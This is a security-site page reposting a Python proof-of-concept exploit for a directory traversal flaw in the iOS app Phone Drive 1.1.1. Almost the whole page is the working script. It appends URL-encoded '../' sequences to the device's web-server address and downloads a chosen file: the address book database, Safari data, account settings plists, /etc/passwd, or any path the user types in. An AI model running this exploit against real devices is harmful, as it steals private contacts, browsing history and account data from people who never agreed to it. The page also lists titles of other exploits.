首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 iPhone/iPad Phone Drive 1.1.1 Directory Traversal 来源：Http://IRCRASH.COM 作者：IRCRASH 发布时间：2011-08-11   #!/usr/bin/python #---------------------------------------------------------------- #Software : iPhone/iPad Phone Drive 1.1.1 #Type of vulnerability : Directory Traversal #Tested On : iPhone 4 (IOS 4.3.3/Jailbroken) #---------------------------------------------------------------- #Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8 #---------------------------------------------------------------- #Discovered by : Khashayar Fereidani #Team Website : Http://IRCRASH.COM #English Forums : Http://IRCRASH.COM/forums/ #Team Members : Khashayar Fereidani , Arash Allebrahim #Email : irancrash [ a t ] gmail [ d o t ] com #Facebook : http://facebook.com/fereidani #Twitter : http://twitter.com/ircrash #---------------------------------------------------------------- import urllib2 def urlread(url,file):     url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file     u = urllib2.urlopen(url)     localFile = open('result.html', 'w')     localFile.write(u.read())     localFile.close()     print "file saved as result.html\nIRCRASH.COM 2011" print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT     -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------" url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):") f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"] print f[1] id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:")) if not('http:' in url):     url='http://'+url if ((id>0) and (id<6)):     file=f[id]     urlread(url,file) if (id==6):     file=raw_input("Enter Local File Address : ")     urlread(url,file)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·FCKeditor all versian Arbitrar ·A-PDF All to MP3 v2.3.0 Univer ·Excel SLYK Format Parsing Buff ·HP Data Protector Remote Root ·Acoustica Mixcraft v1.00 Local ·BisonFTP Server <=v3.5 Remote ·LiteServe 2.81 PASV Command De ·Mozilla Firefox 3.6.16 mChanne ·HP JetDirect PJL Query Executi ·HP JetDirect PJL Interface Uni ·Free CD to MP3 Converter 3.1 U ·Mozilla Firefox 3.6.16 mChanne   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved